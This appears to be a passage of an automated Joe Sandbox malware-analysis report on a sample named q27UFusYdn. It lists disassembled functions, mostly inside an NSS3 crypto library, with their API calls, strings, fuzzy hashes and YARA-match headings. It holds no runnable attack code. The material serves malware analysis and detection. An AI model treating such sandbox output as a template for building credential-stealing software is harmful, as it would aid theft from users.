Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: eb01cadc7e48d1aaca038a9f81e64b6e3af7926d559133952efbca40a80c9c1e
Instruction ID: ee249f944d83506ded53d3f132df69f1ccfab3d91f96174f5ed563adcd567a9d
Opcode Fuzzy Hash: eb01cadc7e48d1aaca038a9f81e64b6e3af7926d559133952efbca40a80c9c1e
Instruction Fuzzy Hash: 601170B1A04B06ABEB109E65DC84B56B3B8FB0435DF344535EA19D7B41E331E864C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE808D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6CE809B3,0000001A,?), ref: 6CE808E9

Part of subcall function 6CE70840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CE708B4

SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6CE808FD

Part of subcall function 6CE6FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CE68D2D,?,00000000,?), ref: 6CE6FB85
Part of subcall function 6CE6FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CE6FBB1

SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6CE80939
PR_SetError.NSS3(FFFFE013,00000000), ref: 6CE80953

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
String ID:
API String ID: 2572351645-0
Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction ID: e894f72f59f21b4f9eee980a2e778195b2b2e65525c2f5959bae484122a92083
Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
Instruction Fuzzy Hash: 0501C4B160364A6BFB149A3A9C10B6737B89F8025CF30643DEC1EC6F41FB31E5148A94

Uniqueness

Uniqueness Score: -1.00%

Function 6CE38DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CE38DE7
EnterCriticalSection.KERNEL32 ref: 6CE38DFC
PR_Unlock.NSS3 ref: 6CE38E2D
PR_SetError.NSS3 ref: 6CE38E49

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: e52d984baff774f9a387698a16481b77ef4f3b1ca139fab1a287e97ee1af9fd4
Instruction ID: b75bf6a97c32497fe178de3e92fe5a857e018ceab6002cfbf971e8e297368f37
Opcode Fuzzy Hash: e52d984baff774f9a387698a16481b77ef4f3b1ca139fab1a287e97ee1af9fd4
Instruction Fuzzy Hash: 4A118F71A05A109BD740BF78D548269BBF4FF05318F11596ADC89D7700E734E854CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6CEBAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CEA5F17,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CEA5F17,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CEAAAD4), ref: 6CEBACDB

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 951fb9795887ed6fbbbd2ced17d2ebf46148d4f427ee0b43d5e7e1b57b78985e
Instruction ID: 1778203465812472f9f79d6ceef0773719cd90a3a2f99ff61c91e62bbda4eae5
Opcode Fuzzy Hash: 951fb9795887ed6fbbbd2ced17d2ebf46148d4f427ee0b43d5e7e1b57b78985e
Instruction Fuzzy Hash: D10129B1A11B019BEB50DF2ADA08767B7F8BB00659B244839D89AD3B00E731F054CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F29
6F@, xrefs: 00416F37

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: b5f8bb415bf48ce7be5bc642ec728c9009fc5aef9801c6ea708fecfa6406f1e0
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 6CE688E0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,6CE708AA,?), ref: 6CE688F6
EnterCriticalSection.KERNEL32(?,?,?,?,6CE708AA,?), ref: 6CE6890B
PR_NotifyCondVar.NSS3(?,?,?,?,?,6CE708AA,?), ref: 6CE68936
PR_Unlock.NSS3(?,?,?,?,?,6CE708AA,?), ref: 6CE68940

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CondCriticalEnterNotifySectionUnlockValue
String ID:
API String ID: 959714679-0
Opcode ID: 37f6af1b0d15c19d243d9c3bb3e2dbdbd822ab74e7e03007afa6d94074022ad9
Instruction ID: 35d5ac0f756044fe37afaea2e454f4e16631568629fd09c3ed55d6e10ce76f03
Opcode Fuzzy Hash: 37f6af1b0d15c19d243d9c3bb3e2dbdbd822ab74e7e03007afa6d94074022ad9
Instruction Fuzzy Hash: AC018474A14A459BDB10AF3AC084665B7F4FF1635CF155A2AD89987B00E730E4A4CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE724E0 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6CE4C154,000000FF,00000000,00000000,00000000,00000000,?,?,6CE4C154,?), ref: 6CE724FA
PORT_Alloc_Util.NSS3(00000000,?,6CE4C154,?), ref: 6CE72509

Part of subcall function 6CE70BE0: malloc.MOZGLUE(6CE68D2D,?,00000000,?), ref: 6CE70BF8
Part of subcall function 6CE70BE0: TlsGetValue.KERNEL32(6CE68D2D,?,00000000,?), ref: 6CE70C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?), ref: 6CE72525
free.MOZGLUE(00000000), ref: 6CE72532

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_UtilValuefreemalloc
String ID:
API String ID: 929835568-0
Opcode ID: d09242954eea10ddc56ad3072b4a3928651b5295e4fc1bafbaaa322c487c9b7e
Instruction ID: 79fa9b32faa41de0173c284614cba0613e9b508a5356a2dd40db2d1a29609e43
Opcode Fuzzy Hash: d09242954eea10ddc56ad3072b4a3928651b5295e4fc1bafbaaa322c487c9b7e
Instruction Fuzzy Hash: 7CF012B671612576FA20256A5C59E7739BCDB416FDB240221B938D66C1D951C801C1B2

Uniqueness

Uniqueness Score: -1.00%

Function 6CEA0450 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(40C70845,?,6CEA4710,?,000F4240,00000000), ref: 6CEA046B
GetLastError.KERNEL32(?,6CEA4710,?,000F4240,00000000), ref: 6CEA0479

Part of subcall function 6CEBBF80: TlsGetValue.KERNEL32(00000000,?,6CEA461B,-00000004), ref: 6CEBC244

PR_Unlock.NSS3(40C70845,?,6CEA4710,?,000F4240,00000000), ref: 6CEA0492
PR_SetError.NSS3(FFFFE89D,00000000,?,6CEA4710,?,000F4240,00000000), ref: 6CEA04A5

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Error$LastMutexReleaseUnlockValue
String ID:
API String ID: 4014558462-0
Opcode ID: 0f443b854f4d69989b5ea096500fd88f05f7d0e43dcc23b6f3104da02d76bdea
Instruction ID: f9aa541e8b4436d121238e1fbcb43a64b9a9e3f8f6a196254727bd973b4a347c
Opcode Fuzzy Hash: 0f443b854f4d69989b5ea096500fd88f05f7d0e43dcc23b6f3104da02d76bdea
Instruction Fuzzy Hash: 8DF0B474B147C55FEF10AAF59D18B2A36B9BB0220DF348434E80BCBB50EB31E4468551

Uniqueness

Uniqueness Score: -1.00%

Function 6CF2CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6CF2CC61
free.MOZGLUE ref: 6CF2CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6CF2CC80
free.MOZGLUE(?), ref: 6CF2CC87

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 8d7636414a1db94798727ac6f339c65829e8264ee9e046055f6861a989d3533d
Instruction ID: 28777c18092af81c7c0a9213773288b1db0d15bd9872e7829fd50f0e1f725c86
Opcode Fuzzy Hash: 8d7636414a1db94798727ac6f339c65829e8264ee9e046055f6861a989d3533d
Instruction Fuzzy Hash: A3E065767016089FCE10EFA9DC44C9777BCEE492703150525E691C3700D231F905CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE66E40 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 257timeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE67122
PR_ImplodeTime.NSS3(?), ref: 6CE67162

Strings

5s/, xrefs: 6CE66E4C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: ErrorImplodeTime
String ID: 5s/
API String ID: 1407570941-340167759
Opcode ID: aeecaa233857e21f808f4403bf88ff2c2f9817e19253d1139a0c3d2a1c25c6bb
Instruction ID: 5dea210faeb8448f357ba000280d9db3474565729645b6a0a6fa121f4ef9d250
Opcode Fuzzy Hash: aeecaa233857e21f808f4403bf88ff2c2f9817e19253d1139a0c3d2a1c25c6bb
Instruction Fuzzy Hash: 3BA16B326906458FD7208E2DC8A17EAB7F59B41325F68076BD4614FBF7F33885864780

Uniqueness

Uniqueness Score: -1.00%

Function 6CE2ED30 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

PK11_HashBuf.NSS3(00000004,?,NYl,00000000), ref: 6CE2ED84

Part of subcall function 6CE3DDD0: SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CE3DDEC
Part of subcall function 6CE3DDD0: PK11_DigestBegin.NSS3(00000000), ref: 6CE3DE70
Part of subcall function 6CE3DDD0: PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CE3DE83
Part of subcall function 6CE3DDD0: HASH_ResultLenByOidTag.NSS3(?), ref: 6CE3DE95
Part of subcall function 6CE3DDD0: PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CE3DEAE
Part of subcall function 6CE3DDD0: PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CE3DEBB

Part of subcall function 6CE310D0: PR_EnterMonitor.NSS3 ref: 6CE310EE

Strings

NYl, xrefs: 6CE2ED5E, 6CE2ED7F
5s/, xrefs: 6CE2ED3C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: K11_$Digest$BeginContextDestroyEnterFinalFindHashMonitorResultTag_Util
String ID: NYl$5s/
API String ID: 56469180-381533527
Opcode ID: 665f195976348247e9d75e96a31742b83ebde27f2eca0e5d867d2ed0f6e4ffee
Instruction ID: a81289a8b840ea47d6669765c717e7091b810a789e3d7ca0e61e54c587fc9218
Opcode Fuzzy Hash: 665f195976348247e9d75e96a31742b83ebde27f2eca0e5d867d2ed0f6e4ffee
Instruction Fuzzy Hash: E251B071E006299BDB04CFA5C480BDDB7B4FF08349F244619E816ABB41E735E959CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6CD94470 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113timeCOMMON

Download Yara Rule

APIs

PR_ParseTimeStringToExplodedTime.NSS3(?,?,?), ref: 6CD94490
PR_NormalizeTime.NSS3(?,?), ref: 6CD944C2

Strings

5s/, xrefs: 6CD9447F

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Time$ExplodedNormalizeParseString
String ID: 5s/
API String ID: 4196962675-340167759
Opcode ID: 4a009fdeb9eeed8c8d98ae9c4bf0f25107698033525067ed08db5f8713926eb5
Instruction ID: 03eb5ae7c67b479f3f2117082ff6a7551b5527c4a1cbe610d07b76fdd23a1a86
Opcode Fuzzy Hash: 4a009fdeb9eeed8c8d98ae9c4bf0f25107698033525067ed08db5f8713926eb5
Instruction Fuzzy Hash: 0541D672F006288BC708CF58CD515AAB7B6AFD870470AC62DDD09AF756E670ED45C780

Uniqueness

Uniqueness Score: -1.00%

Function 6CE0CE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6CE0CF4C
free.MOZGLUE(?), ref: 6CE0CF86

Strings

5s/, xrefs: 6CE0CE7D

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: Errorfree
String ID: 5s/
API String ID: 4048819709-340167759
Opcode ID: 1ca8bf0558f3e2bc15153af2c5a2672a25fcddd5cfbc06a807f0de133d60c8c2
Instruction ID: ae101cadf2c640208973afeb425a1cb763e81433557a56b8d53cbf5751b26bc6
Opcode Fuzzy Hash: 1ca8bf0558f3e2bc15153af2c5a2672a25fcddd5cfbc06a807f0de133d60c8c2
Instruction Fuzzy Hash: C931A430F04B158BC720EF29C401656B3F0AF45328B25875DD86A6BB51D730E991CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE1AC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CE1ACDC

Part of subcall function 6CE306A0: TlsGetValue.KERNEL32 ref: 6CE306C2
Part of subcall function 6CE306A0: EnterCriticalSection.KERNEL32(?), ref: 6CE306D6
Part of subcall function 6CE306A0: PR_Unlock.NSS3 ref: 6CE306EB

Part of subcall function 6CE33810: TlsGetValue.KERNEL32(?,6CE1A8F0,?,00000000), ref: 6CE33827
Part of subcall function 6CE33810: EnterCriticalSection.KERNEL32(?,?,6CE1A8F0,?,00000000), ref: 6CE33840
Part of subcall function 6CE33810: TlsGetValue.KERNEL32(?,?,?,6CE1A8F0,?,00000000), ref: 6CE3385A
Part of subcall function 6CE33810: EnterCriticalSection.KERNEL32(?,?,?,?,6CE1A8F0,?,00000000), ref: 6CE3386F
Part of subcall function 6CE33810: PL_HashTableLookup.NSS3(?,?,?,?,?,6CE1A8F0,?,00000000), ref: 6CE33888
Part of subcall function 6CE33810: PR_Unlock.NSS3(?,?,?,?,?,6CE1A8F0,?,00000000), ref: 6CE33895
Part of subcall function 6CE33810: PR_Unlock.NSS3(?,?,?,?,?,6CE1A8F0,?,00000000), ref: 6CE338B6

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,6CE84E82,?), ref: 6CE1ACB7

Part of subcall function 6CE6F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6CE0F379,?,00000000,-00000002), ref: 6CE6F9B7

Strings

5s/, xrefs: 6CE1AC5C

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

Associated: 00000000.00000002.2196235523.000000006CD90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196384856.000000006CF2F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196419148.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196447580.000000006CF6F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196467060.000000006CF70000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2196485729.000000006CF75000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cd90000_q27UFusYdn.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Util$AllocArenaErrorHashItem_LookupMark_Table
String ID: 5s/
API String ID: 3179275099-340167759
Opcode ID: ceb7e7db6d9e6f3e8fafc662efc757ecb98ba9000782edc72de8be65dab09488
Instruction ID: c2971274fe0d03144e625e05a8c36f6982e53e39da99f0f6eaebefcfbf02f258
Opcode Fuzzy Hash: ceb7e7db6d9e6f3e8fafc662efc757ecb98ba9000782edc72de8be65dab09488
Instruction Fuzzy Hash: 2D21E5B1B452056FE7048A38DD40BB677B8AF44A5CF35402CE81997F41EB21E829C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE2C8F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000), ref: 6CE2C947

Strings

5s/, xrefs: 6CE2C8FF
Ol, xrefs: 6CE2C8F0

Memory Dump Source

Source File: 00000000.00000002.2196255121.000000006CD91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD90000, based on PE: true

